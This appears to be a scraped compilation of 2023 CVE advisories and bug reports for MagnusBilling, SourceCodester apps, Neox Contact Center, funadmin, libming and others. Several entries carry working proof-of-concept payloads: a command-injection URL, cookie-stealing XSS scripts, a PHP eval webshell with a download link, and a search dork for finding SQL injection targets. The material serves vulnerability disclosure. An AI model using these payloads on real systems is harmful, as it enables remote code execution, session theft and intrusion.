Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.

../ advisories/

A command injection vulnerability exists in magnusbilling versions 6 and 7. The vulnerability allows an unauthenticated user to execute arbitrary OS commands on the host, with the privileges of the web server.

**Affected products**

magnusbilling 7 up to and including commit 7af21ed620

magnusbilling 6 (all versions)

**Steps to reproduce**

The following proof of concept uses a harmless sleep 30 command as a payload.

1.  Visit /mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%2030;ls%20a
2.  Observe that the page takes 30 seconds to load
3.  Visit /mbilling/lib/icepay/icepay.php?democ=/dev/null;sleep%203;ls%20a
4.  Observe that the page takes only 3 seconds to load

**Cause**

A piece of demonstration code is present in lib/icepay/icepay.php, with a call to exec() at line 753. The parameter to exec() includes the GET parameter democ, which is controlled by the user.

**Impact**

An unauthenticated user is able to execute arbitrary OS commands. The commands run with the privileges of the web server process, typically www-data. At a minimum, this allows an attacker to compromise the billing system and its database.

**Proposed Mitigation**

Remove the demo code from icepay.php.

**History**

*   2023-03-28: Initial report removed by maintainer
*   2023-03-27: Vulnerability fixed
*   2023-03-27: Vulnerability reported

CVE-2023-30258: Security advisory

A vulnerability, which was classified as critical, was found in SourceCodester Game Result Matrix System 1.0. This affects an unknown part of the file /dipam/athlete-profile.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-232239.

CVE-2023-3383

A vulnerability classified as problematic was found in SourceCodester Online School Fees System 1.0. Affected by this vulnerability is an unknown functionality of the file /paysystem/datatable.php of the component GET Parameter Handler. The manipulation of the argument doj leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-232237 was assigned to this vulnerability.

**Online School Fees System v1.0 has reflected cross-site scripting**

BUG\_Author: zhangyf

Website source code address: https://www.sourcecodester.com/php/11708/online-school-fees-system.html

Vulnerability File: /paysystem/datatable.php

GET parameter "doj" exists reflected cross-site scripting vulnerability

Payload: /paysystem/datatable.php?student=1&doj=<script>alert(document.cookie)</script>&type=feesearch

The js code is successfully executed and the cookie value is returned, which proves that there is a reflected cross-site scripting vulnerability.

CVE-2023-3381: CVEReport/XSS2.md at main · M9KJ-TEAM/CVEReport

A vulnerability, which was classified as problematic, has been found in SourceCodester Game Result Matrix System 1.0. Affected by this issue is some unknown functionality of the file /dipam/save-delegates.php of the component GET Parameter Handler. The manipulation of the argument del_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-232238 is the identifier assigned to this vulnerability.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2023-3382: CVEReport/XSS3.md at main · M9KJ-TEAM/CVEReport

Cross Site Scripting (XSS) vulnerability in Neox Contact Center 2.3.9, via the serach_sms_api_name parameter to the SMA API search.

Reflected Cross-Site Scripting in Neox Contact Center.

Reflected cross-site scripting (or XSS) arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way.

Steps to Reproduce :-

1\. You need to login to Neox Contact Center as admin.

2\. Visit the path https://neox.target.com/admin/admin.php?ADD=1&mode=serach&search\_sms\_api\_name=Enter\_Your\_Payload\_here

3\. Payload "><script>alert(1)</script>

4\. The PAyload will get executed.

Thank you for your visit

CVE-2023-30347: CVE-2023-30347/poc.txt at main · huzefa2212/CVE-2023-30347

An issue discovered in /admin.php in Pluck CMS 4.7.15 through 4.7.16-dev5 allows remote attackers to run arbitrary code via manage file functionality.

CVE-2023-27083

Fortra Globalscape EFT's administration server suffers from an information disclosure vulnerability where the serial number of the harddrive that Globalscape is installed on can be remotely determined via a "trial extension request" message


CVE-2023-2991: Multiple Vulnerabilities in Fortra Globalscape EFT Administration Server [FIXED]

libming listswf 0.4.7 was discovered to contain a buffer overflow in the parseSWF_DEFINEFONTINFO() function at parser.c.

**Allocation size overflow in parseSWF\_DEFINEFONTINFO() at parser.c:1948**

Allocation size overflow in the listswf at function parseSWF\_DEFINEFONTINFO in parser.c:1948.

**Environment**

Ubuntu 18.04, 64 bit  
libming 0.4.7

**Steps to reproduce**

1.  download file

    git clone https://github.com/libming/libming.git libming-ming-0_4_7
    

2.  compile libming with ASAN

    cd libming-ming-0_4_7
    git checkout 5aa3470
    ./autogen.sh
    export FORCE_UNSAFE_CONFIGURE=1
    export LLVM_COMPILER=clang
    CC=wllvm CXX=wllvm++ CFLAGS="-g -O0 -fcommon -Wno-error" ./configure --prefix=`pwd`/obj-bc --with-php-config=/usr/bin/php-config7.2 --enable-static --disable-shared
    make
    make install
    
    cd obj-bc/bin/
    extract-bc listswf
    clang -fsanitize=address -lz -lm listswf.bc -o listswf_asan
    

3.  command for reproducing the error

Download poc:  
libming\_0-4-7\_listswf\_allocation-size-overflow\_parser1948.zip

**ASAN report**

    root@a71b82b5d288:~/dataset/libming-ming-0_4_7/obj-bc/bin# ./listswf_asan libming_0-4-7_listswf_allocation-size-overflow_parser1948.swf 
    header indicates a filesize of 6350 but filesize is 296
    File version: 10
    File size: 296
    Frame size: (0,0)x(0,0)
    Frame rate: 237.609375 / sec.
    Total frames: 31640
    =================================================================
    ==29667==ERROR: AddressSanitizer: requested allocation size 0xfffffffffffffed6 (0x6d8 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
        #0 0x4ade60 in malloc /root/LLVM/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x50fefd in parseSWF_DEFINEFONTINFO /root/dataset/libming-ming-0_4_7/util/parser.c:1948:34
        #2 0x4fefda in blockParse /root/dataset/libming-ming-0_4_7/util/blocktypes.c:145:14
        #3 0x4fceb2 in readMovie /root/dataset/libming-ming-0_4_7/util/main.c:265:11
        #4 0x4fca7d in main /root/dataset/libming-ming-0_4_7/util/main.c:350:2
        #5 0x7fa41cb57c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310
    
    ==29667==HINT: if you don't care about these errors you may set allocator_may_return_null=1
    SUMMARY: AddressSanitizer: allocation-size-too-big /root/LLVM/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 in malloc
    ==29667==ABORTING

CVE-2023-36239: Allocation size overflow in parseSWF_DEFINEFONTINFO() at parser.c:1948 · Issue #273 · libming/libming

funadmin v3.3.2 and v3.3.3 are vulnerable to Insecure file upload via the plugins install.

Vulnerability Product:funadmin  
Vulnerability version:.3.3.2 - 3.3.3  
Vulnerability type:Insecure file upload  
Vulnerability Details：  
Vulnerability location app\\backend\\controller\\Addon.php#localinstall method

the method:localinstall doesn't check any webshell or sensitive function in file, which may cause insecure file upload.  
  
firstly, we download a free plugin and unzip it. the rootpath of plugin is as follows:  
  
then, we add a webshell into /public/js  
  
content of shell: <?pup @eval($_REQUEST['shell']); ?>  
after it, we zip the entire plugin  
  
example plugin(already placed webshell): https://github.com/Leeyangee/leeya\_bug/raw/main/demo.zip

finally, we just find a website uses funadmin v3.3.2, visit: http://localhost/backend/index/index.html, click "install offline" "离线安装"  
  
and select the plugin we just zipped, after installed , visit http://localhost/static/demo/js/shell.php?shell=phpinfo();  
  
Proof that this has been uploaded webshell via plugins install

Discoverer:leeya\_bug

CVE-2023-36097: Insecure file upload via plugins install in funadmin v3.3.2 - v3.3.3 · Issue #17 · funadmin/funadmin

ACJWEB DESIGNER version 1.0 suffers from a remote SQL injection vulnerability.

    ======================================================================================|| # Title     : ACJWEB DESIGNER 1.0 - SQL Injection Vulnerability                     || # Author    : indoushka                                                             |                                            | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |                                          | # Vendor    : aluizio81@gmail.com                                                   || # Drok      : inurl:sobre.php?id=                                                   |======================================================================================|poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : http://127.0.0.1/asmac.combr/sobre.php?id= <======inject here[+] login = login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        =======================================================================================================================================

Tag

#php